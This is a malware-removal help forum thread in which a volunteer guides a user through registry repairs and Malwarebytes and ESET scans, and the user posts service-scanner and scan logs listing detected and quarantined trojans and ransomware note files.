Running from "C:\Users\user\Downloads"

Microsoft Windows 8.1 with Bing (X64)

Boot Mode: Normal

****************************************************************

Internet Services:

============

Connection Status:

==============

Localhost is accessible.

LAN connected.

Google IP is accessible.

Google.com is accessible.

Yahoo.com is accessible.

Windows Firewall:

=============

Firewall Disabled Policy:

==================

System Restore:

============

System Restore Policy:

========================

Action Center:

============

Windows Update:

============

wuauserv Service is not running. Checking service configuration:

The start type of wuauserv service is set to Demand. The default start type is Auto.

The ImagePath of wuauserv service is OK.

The ServiceDll of wuauserv service is OK.

Windows Autoupdate Disabled Policy:

============================

Windows Defender:

==============

WinDefend Service is not running. Checking service configuration:

The start type of WinDefend service is OK.

The ImagePath of WinDefend: ""%ProgramFiles%\Windows Defender\MsMpEng.exe"".

Windows Defender Disabled Policy:

==========================

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender]

"DisableAntiSpyware"=DWORD:1

Other Services:

==============

File Check:

========

C:\Windows\System32\nsisvc.dll => File is digitally signed

C:\Windows\System32\drivers\nsiproxy.sys => File is digitally signed

C:\Windows\System32\dhcpcore.dll => File is digitally signed

C:\Windows\System32\drivers\afd.sys => File is digitally signed

C:\Windows\System32\drivers\tdx.sys => File is digitally signed

C:\Windows\System32\Drivers\tcpip.sys => File is digitally signed

C:\Windows\System32\dnsrslvr.dll => File is digitally signed

C:\Windows\System32\mpssvc.dll => File is digitally signed

C:\Windows\System32\bfe.dll => File is digitally signed

C:\Windows\System32\drivers\mpsdrv.sys => File is digitally signed

C:\Windows\System32\wscsvc.dll => File is digitally signed

C:\Windows\System32\wbem\WMIsvc.dll => File is digitally signed

C:\Windows\System32\wuaueng.dll => File is digitally signed

C:\Windows\System32\qmgr.dll => File is digitally signed

C:\Windows\System32\es.dll => File is digitally signed

C:\Windows\System32\cryptsvc.dll => File is digitally signed

C:\Program Files\Windows Defender\MpSvc.dll => File is digitally signed

C:\Program Files\Windows Defender\MsMpEng.exe => File is digitally signed

C:\Windows\System32\ipnathlp.dll => File is digitally signed

C:\Windows\System32\iphlpsvc.dll => File is digitally signed

C:\Windows\System32\svchost.exe => File is digitally signed

C:\Windows\System32\rpcss.dll => File is digitally signed

**** End of log ****

#9
Nevan

Posted 05 September 2015 - 03:15 PM

Trusted Helper

Malware Removal
1,765 posts

Hello again, xander291190.

No problem, I'll wait until you say it's all good

Let's continue.

Step #1

Registry repair

Download the attached .reg files to your Desktop.

WinDefend.reg 7KB 180 downloads

wuauserv.reg 6.86KB 282 downloads

Launch the files by double-clicking them Allow the files to be added to the registry.
Once you're done, restart your system.

Step #2

Farbar Service Scanner

Right click FSS.exe on your desktop and click Run as administrator.
Make sure that all options are checked and click Scan
It will create a log (FSS.txt) on the Desktop.
Double click FSS.txt. Select all (CTRL+A) the content of the log, copy it (CTRL+C) and paste (CTRL+V) it into your next reply

Step #3

Malwarebytes Anti-Malware

I can see that you currently have Malwarebytes Anti-Malware installed on your computer. We'll use it.

Launch Malwarebytes Anti-Malware
In Database version section, click Update Now
Once the update is done, click Settings>Detection and Protection
Make sure that all three boxes under Detection Options are checked
Go back to Dashboard and click the big, green Scan Now button.
Wait for Malwarebytes Anti-Malware to finish the scan
If the program will detect anything, click Remove Selected. The program might want to reboot the system. Allow it it wants to.
Once the deletion is done (or after reboot), go to History, select Application Logs and click the latest Scan Log.
Click Export, then click Copy to Clipboard.
Paste (CTRL+V) the log into your next reply.

Step #4

ESET Online Scanner

Note: This step can only be done using Internet Explorer, Google Chrome or Mozilla Firefox

Disable your Antivirus program (click here if you don't know how to do this).
Visit ESET site
Click
When using:
- Internet Explorer:
  - Accept the Terms of Use and click Start
  - Allow the running of add-on
- Other browsers:
  - Download esetsmartinstaller_enu.exe that you'll be given link to
  - Double click esetsmartinstaller_enu.exe
  - Allow the Terms of Use and click Start
Make sure that the options are set as the example below:
Click Start
The program will begin to download it's virus database. The speed may vary depending on your Internet connection.
When completed, the program will begin to scan. This may take several hours. Please, be patient.
Do not do anything on your machine as it may interrupt the scan
When the scan is done, click Finish
A log.txt file will be created at C:\Program Files (x86)\ESET\ESET Online Scanner. Open it using Notepad.
Select all (CTRL+A) the content of the log, copy it (CTRL+C) and paste (CTRL+V) it into your next reply.

Remember to enable your Antivirus program once you're done!

Things that should appear in your next post:

FSS.txt log content
Malwarebytes Anti-Malware log content
ESET Online Scanner log content

#10
xander291190

Posted 06 September 2015 - 05:26 PM

Member

Topic Starter
Member
13 posts

Here we go.

FSS:

Farbar Service Scanner Version: 26-07-2015

Ran by user (administrator) on 06-09-2015 at 09:29:40

Running from "C:\Users\user\Downloads"

Microsoft Windows 8.1 with Bing (X64)

Boot Mode: Normal

****************************************************************

Internet Services:

============

Connection Status:

==============

Localhost is accessible.

LAN connected.

Google IP is accessible.

Google.com is accessible.

Yahoo.com is accessible.

Windows Firewall:

=============

Firewall Disabled Policy:

==================

System Restore:

============

System Restore Policy:

========================

Action Center:

============

Windows Update:

============

wuauserv Service is not running. Checking service configuration:

The start type of wuauserv service is set to Demand. The default start type is Auto.

The ImagePath of wuauserv service is OK.

The ServiceDll of wuauserv service is OK.

Windows Autoupdate Disabled Policy:

============================

Windows Defender:

==============

WinDefend Service is not running. Checking service configuration:

The start type of WinDefend service is OK.

The ImagePath of WinDefend service is OK.

Windows Defender Disabled Policy:

==========================

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender]

"DisableAntiSpyware"=DWORD:1

Other Services:

==============

File Check:

========

C:\Windows\System32\nsisvc.dll => File is digitally signed

C:\Windows\System32\drivers\nsiproxy.sys => File is digitally signed

C:\Windows\System32\dhcpcore.dll => File is digitally signed

C:\Windows\System32\drivers\afd.sys => File is digitally signed

C:\Windows\System32\drivers\tdx.sys => File is digitally signed

C:\Windows\System32\Drivers\tcpip.sys => File is digitally signed

C:\Windows\System32\dnsrslvr.dll => File is digitally signed

C:\Windows\System32\mpssvc.dll => File is digitally signed

C:\Windows\System32\bfe.dll => File is digitally signed

C:\Windows\System32\drivers\mpsdrv.sys => File is digitally signed

C:\Windows\System32\wscsvc.dll => File is digitally signed

C:\Windows\System32\wbem\WMIsvc.dll => File is digitally signed

C:\Windows\System32\wuaueng.dll => File is digitally signed

C:\Windows\System32\qmgr.dll => File is digitally signed

C:\Windows\System32\es.dll => File is digitally signed

C:\Windows\System32\cryptsvc.dll => File is digitally signed

C:\Program Files\Windows Defender\MpSvc.dll => File is digitally signed

C:\Program Files\Windows Defender\MsMpEng.exe => File is digitally signed

C:\Windows\System32\ipnathlp.dll => File is digitally signed

C:\Windows\System32\iphlpsvc.dll => File is digitally signed

C:\Windows\System32\svchost.exe => File is digitally signed

C:\Windows\System32\rpcss.dll => File is digitally signed

**** End of log ****

MalwareBytes:

Malwarebytes Anti-Malware

www.malwarebytes.org

Scan Date: 6/09/2015

Scan Time: 9:32 AM

Logfile: MalwareBytes.txt

Administrator: Yes

Version: 2.1.8.1057

Malware Database: v2015.09.05.07

Rootkit Database: v2015.08.16.01

License: Trial

Malware Protection: Enabled

Malicious Website Protection: Enabled

Self-protection: Disabled

OS: Windows 8.1

CPU: x64

File System: NTFS

User: user

Scan Type: Threat Scan

Result: Cancelled

Objects Scanned: 0

(No malicious items detected)

Time Elapsed: 0 min, 36 sec

Memory: Enabled

Startup: Enabled

Filesystem: Enabled

Archives: Enabled

Rootkits: Disabled

Heuristics: Enabled

PUP: Enabled

PUM: Enabled

Processes: 0

(No malicious items detected)

Modules: 0

(No malicious items detected)

Registry Keys: 0

(No malicious items detected)

Registry Values: 0

(No malicious items detected)

Registry Data: 0

(No malicious items detected)

Folders: 0

(No malicious items detected)

Files: 0

(No malicious items detected)

Physical Sectors: 0

(No malicious items detected)

(end)

ESETSmartInstaller@High as downloader log:

all ok

# product=EOS

# version=8

# OnlineScannerApp.exe=1.0.0.1

# EOSSerial=9b95a216f1e7ab4aa0efb9290f3ec81f

# end=init

# utc_time=2015-09-06 12:13:44

# local_time=2015-09-06 10:13:44 (+1000, AUS Eastern Standard Time)

# country="Australia"

# osver=6.2.9200 NT

ESETSmartInstaller@High as downloader log:

all ok

# product=EOS

# version=8

# OnlineScannerApp.exe=1.0.0.1

# EOSSerial=9b95a216f1e7ab4aa0efb9290f3ec81f

# end=init

# utc_time=2015-09-06 12:27:53

# local_time=2015-09-06 10:27:53 (+1000, AUS Eastern Standard Time)

# country="Australia"

# osver=6.2.9200 NT

Update Init

Update Download

Update Finalize

Updated modules version: 25622

# product=EOS

# version=8

# OnlineScannerApp.exe=1.0.0.1

# EOSSerial=9b95a216f1e7ab4aa0efb9290f3ec81f

# end=updated

# utc_time=2015-09-06 12:30:43

# local_time=2015-09-06 10:30:43 (+1000, AUS Eastern Standard Time)

# country="Australia"

# osver=6.2.9200 NT

# product=EOS

# version=8

# OnlineScannerApp.exe=1.0.0.1

# OnlineScanner.ocx=1.0.0.7777

# api_version=3.1.1

# EOSSerial=9b95a216f1e7ab4aa0efb9290f3ec81f

# engine=25622

# end=finished

# remove_checked=true

# archives_checked=false

# unwanted_checked=true

# unsafe_checked=false

# antistealth_checked=true

# utc_time=2015-09-06 01:40:42

# local_time=2015-09-06 11:40:42 (+1000, AUS Eastern Standard Time)

# country="Australia"

# lang=1033

# osver=6.2.9200 NT

# compatibility_mode_1='Panda Free Antivirus'

# compatibility_mode=1557 16777213 87 100 463100 227703216 0 0

# compatibility_mode_1=''

# compatibility_mode=5893 16776574 100 94 32329 14790007 0 0

# scanned=214727

# found=207

# cleaned=207

# scan_time=4198

sh=802757863B6651E4DAC09CAAD92462343715C7FE ft=1 fh=2ea60577d4105f61 vn="a variant of Win32/Kryptik.DVSV trojan (cleaned by deleting - quarantined)" ac=C fn="C:\FRST\Quarantine\C\ProgramData\msbogj.exe.xBAD"

sh=AC87535F09FFEE83B3198F186A68B9248C7980F6 ft=1 fh=2ed57a37f4829cc6 vn="a variant of Win32/Kryptik.DUHI trojan (cleaned by deleting - quarantined)" ac=C fn="C:\FRST\Quarantine\C\Users\user\AppData\Local\Ufrmedia\crypted"

sh=860059EC7A677C9987005A76321BB5A6A9176CBA ft=1 fh=be6a67a6f4829cc6 vn="a variant of Win32/Kryptik.DUHI trojan (cleaned by deleting - quarantined)" ac=C fn="C:\FRST\Quarantine\C\Users\user\AppData\Local\Ufrmedia\crypted.old"

sh=9505BC892377082519A566D3A1E7CC741F642A9E ft=1 fh=b5a7ea26f3487e8e vn="Win32/Boaxxe.CS trojan (cleaned by deleting - quarantined)" ac=C fn="C:\FRST\Quarantine\C\Users\user\AppData\Local\Ufrmedia\frivolled.dll.old"

sh=22A351636C98A10DF50BE1B6F348DF42CBB3C511 ft=1 fh=09a81671feade241 vn="a variant of Win32/Injector.CHAI trojan (cleaned by deleting - quarantined)" ac=C fn="C:\FRST\Quarantine\C\Users\user\AppData\Local\Ufrmedia\tmp3740.exe"

sh=2482644F8D1773A2BED5268F89BB9F693C062AB9 ft=1 fh=3b0a9130d4e9283d vn="a variant of Win32/Injector.CGWF trojan (cleaned by deleting - quarantined)" ac=C fn="C:\FRST\Quarantine\C\Users\user\AppData\Local\Ufrmedia\tmpA932.exe"

sh=364EF3CFC33D1A9AB7FA9353CF41DCD1C8F614E1 ft=1 fh=fc66eaf1c1ccf4af vn="a variant of Win32/Kryptik.DVGD trojan (cleaned by deleting - quarantined)" ac=C fn="C:\FRST\Quarantine\C\Users\user\AppData\Local\YbPack\comNetengine.dll"

sh=318CAD37446D8C72D7FF5BF9BC990C38FA709903 ft=1 fh=c0db1b1bf4829cc6 vn="a variant of Win32/Kryptik.DUHI trojan (cleaned by deleting - quarantined)" ac=C fn="C:\FRST\Quarantine\C\Users\user\AppData\Local\YbPack\crypted"

sh=5893079BDF4C14F01D2D4A9E21FD63CE47EE8592 ft=1 fh=2518f7b7f3487e8e vn="Win32/Boaxxe.CS trojan (cleaned by deleting - quarantined)" ac=C fn="C:\FRST\Quarantine\C\Users\user\AppData\Local\YbPack\frivolled.dll"

sh=6E9AAC0FB67A0D8A50EA1E9976CEDC1CC040DCF0 ft=1 fh=f51321ce98f6db54 vn="Win32/Boaxxe.CS trojan (cleaned by deleting - quarantined)" ac=C fn="C:\FRST\Quarantine\C\Users\user\AppData\Local\YbPack\reinfects.dll"

sh=BD3233BA5B36B19F98948BBBE991BCF289A3B562 ft=1 fh=86f241c06c002bf0 vn="Win32/Boaxxe.CS trojan (cleaned by deleting - quarantined)" ac=C fn="C:\FRST\Quarantine\C\Users\user\AppData\Local\YbPack\uroses.dll"

sh=CABAC1C115B6C2C35CE1AD62B2D5746816A4CF41 ft=1 fh=f027039458059b35 vn="a variant of Win32/Ponmocup.LX trojan (cleaned by deleting - quarantined)" ac=C fn="C:\FRST\Quarantine\C\Users\user\AppData\Roaming\scrrunp.dll.xBAD"

sh=45E7DBD54F217A4A6852AE87432B90A5CF5E5FC9 ft=1 fh=f408c08e8a312898 vn="a variant of Win32/Kryptik.DVHC trojan (cleaned by deleting - quarantined)" ac=C fn="C:\FRST\Quarantine\C\Users\user\AppData\Roaming\FireFoxUpdServeis\[email protected]"

sh=DCD9529F41089A9738F9AA5CE764A42B13DE3D4E ft=1 fh=049d85f4591bd93a vn="a variant of Win32/Kryptik.DVFC trojan (cleaned by deleting - quarantined)" ac=C fn="C:\FRST\Quarantine\C\Users\user\AppData\Roaming\GoogleUpdate\ChromeUpdate.exe"

sh=3858994D2B8C9D8B87C826A46C05CF60A790DAA6 ft=1 fh=8a1e5e1d58892132 vn="a variant of Win32/Toolbar.Visicom.A potentially unwanted application (deleted - quarantined)" ac=C fn="C:\Program Files (x86)\Panda Security\Panda Security Protection\Tools\PandaSecurityTb.exe"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\bg-bg\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\bg-bg\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\cs-cz\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\cs-cz\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\da-dk\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\da-dk\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\de-de\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\de-de\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\el-gr\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\el-gr\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\en-gb\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\en-gb\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\en-us\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\en-us\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\es-es\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\es-es\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\et-ee\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\et-ee\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\fi-fi\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\fi-fi\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\Fonts\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\Fonts\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\fr-fr\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\fr-fr\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\hr-hr\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\hr-hr\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\hu-hu\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\hu-hu\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\it-it\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\it-it\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\ja-jp\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\ja-jp\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\ko-kr\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\ko-kr\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\lt-lt\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\lt-lt\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\lv-lv\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\lv-lv\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\nb-no\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\nb-no\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\nl-nl\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\nl-nl\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\pl-pl\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\pl-pl\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\pt-br\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\pt-br\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\pt-pt\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\pt-pt\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\ro-ro\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\ro-ro\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\ru-ru\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\ru-ru\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\sk-sk\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\sk-sk\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\sl-si\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\sl-si\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\sr-latn-rs\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\sr-latn-rs\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\sv-se\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\sv-se\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\tr-tr\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\tr-tr\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\uk-ua\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\uk-ua\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\zh-cn\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\zh-cn\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\zh-hk\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\zh-hk\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\boot\zh-tw\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\boot\zh-tw\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\bg-bg\how_decrypt.gif"

sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\bg-bg\how_decrypt.html"

sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Boot\cs-cz\how_decrypt.gif"

